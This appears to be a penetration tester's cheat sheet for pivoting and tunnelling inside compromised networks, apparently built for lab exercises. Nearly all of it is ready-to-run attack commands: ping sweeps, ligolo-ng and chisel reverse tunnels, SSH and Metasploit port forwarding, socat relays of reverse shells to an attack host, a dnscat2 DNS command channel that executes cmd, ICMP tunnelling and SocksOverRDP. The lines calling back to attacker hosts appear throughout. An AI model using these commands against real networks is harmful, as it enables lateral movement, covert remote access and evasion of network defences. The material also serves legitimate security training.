# Ping sweep with various methods
run post/multi/gather/ping_sweep RHOSTS=172.16.5.0/23 # MSF
for i in {1..254} ;do (ping -c 1 172.16.1.$i | grep "bytes from" &) ;done # Linux
for /L %i in (1 1 254) do ping 10.10.10.%i -n 1 -w 100 | find "Reply" # cmd
1..254 | % {"196.168.210.$($_): $(Test-Connection -count 1 -comp 172.16.5.$($_) -quiet)"} # Powershell
sudo ip tuntap add user kali mode tun test
sudo ip link set test up
ligolo-ng -selfcert
Download the agent.exe file to our Target Machine
.
. .\agent.exe -connect <attacker machine>:11601 -ignore-cert
After acquiring session we can start to interact with it.
ligolo-ng » session
ligolo-ng » start
$ ip route add <target cidr> dev ligolo
We can confirm the new route using ip route
For Double Pivot
On the attacker machine, we have to create a listener to send the second host traffic to the proxy server and connect through a tunnel:
listener_add --addr 0.0.0.0:11601 --to 127.0.0.1:11601 --tcp
listener_list
Run This on the second victim machine:
. .\agent.exe -connect <ip of first victim>:11601 -ignore-cert
After acquiring session we can start to interact with it.
ligolo-ng » session
ligolo-ng » start
$ ip route add <target cidr> dev ligolo
The above steps can be repeated for each hop.
Port Forwarding to Attacker Machine
listener_add --addr 0.0.0.0:<victim port> --to 127.0.0.1:<attacker port> --tcp
# Local port forward
ssh -L 1234:localhost:3306 Ubuntu@10.129.202.64
sudo ssh -L 1234:localhost:8011 -i id_rsa james@runner.htb
# Multiple local port forward
ssh -L 1234:localhost:3306 8080:localhost:80 ubuntu@10.129.202.64
# Confirm port forward
netstat -antp | grep 1234
# Dynamic port forwarding
ssh -D 9050 ubuntu@10.129.202.64
# Route traffic through porxychains
proxychains nmap -v -sn 172.16.5.1-200
proxychains xfreerdp /v:172.16.5.19 /u:victor /p:pass@123
ssh -R <InternalIPofPivotHost>:8080:0.0.0.0:8000 ubuntu@<ipAddressofTarget> -vN
# Set up SOCKS proxy with MSF
use auxiliary/server/socks_proxy
socks4 127.0.0.1 9050 # Add line to conf file
# START THE PROXY AND SET TO 4a
# Use autoroute for pivoting
use post/multi/manage/autoroute
run autoroute -s 172.16.5.0/23 # Add route
run autoroute -p # List active routes
# Create local forward from MSF
portfwd add -l 3300 -p 3389 -r 172.16.5.19
portfwd add -R -l 8081 -p 1234 -L 10.10.14.18 # Reverse
# Redirect reverse shell to attack host (forwards packets to attack host)
socat TCP4-LISTEN:8080,fork TCP4:10.10.14.18:80
# Redirect bind shell to attack host (forward packets to Windows Host)
socat TCP4-LISTEN:8080,fork TCP4:172.16.5.19:8443
# With Plink
plink -D 9050 ubuntu@10.129.15.50
# With SSHuttle
sudo sshuttle -r ubuntu@10.129.202.64 172.16.5.0/23 -v
# With rpivot
python2.7 server.py --proxy-port 9050 --server-port 9999 --server-ip 0.0.0.0
python2.7 client.py --server-ip 10.10.14.18 --server-port 9999 # From targets
# Using netsh.exe
netsh.exe interface portproxy add v4tov4 listenport=8080 listenaddress=10.129.15.150 connectport=3389 connectaddress=172.16.5.25
netsh.exe interface portproxy show v4tov4
# Then connect to the machine through the pivot
xfreerdp /v:10.129.42.198:8080 /u:victor /p:pass@123
# Server side
sudo ruby dnscat2.rb --dns host=10.10.14.18,port=53,domain=inlanefreight.local --no-cache
# Client side (with powershell)
Import-Module .\dnscat2.ps1
Start-Dnscat2 -DNSserver 10.10.14.18 -Domain inlanefreight.local -PreSharedSecret 0ec04a91cd1e963f8c03ca499d589d21 -Exec cmd
# Enter session
window -i [id]
Chisel Pivot
# Chisel server on pivot host
.\chisel.exe server -v -p 1234 --socks5
# Connect to the pivot host
./chisel client -v solarlab.htb:1234 socks
# Proxychains config file
tail -f /etc/proxychains.conf
Chisel Reverse Pivot
# Chisel server on attack host
sudo ./chisel server --reverse -v -p 1234 --socks5
# Chisel client on pivot host
./chisel client -v painters.htb:1234 R:socks
# ptunnel server on target host
sudo ./ptunnel-ng -r10.129.202.64 -R22
# Connect from attack host
sudo ./ptunnel-ng -p10.129.202.64 -l2222 -r10.129.202.64 -R22
# Tunnel SSH through ICMP
ssh -p2222 -lubuntu 127.0.0.1
- https://github.com/nccgroup/SocksOverRDP/releases
- https://www.proxifier.com/download/#win-tab
# Load SocksOverRDP dll on pivot host
regsvr32.exe SocksOverRDP-Plugin.dll
# Connect to other host and start server
SocksOverRDP-Server.exe
# Configure SOCKS profile on port 1080
# RDP to wanted host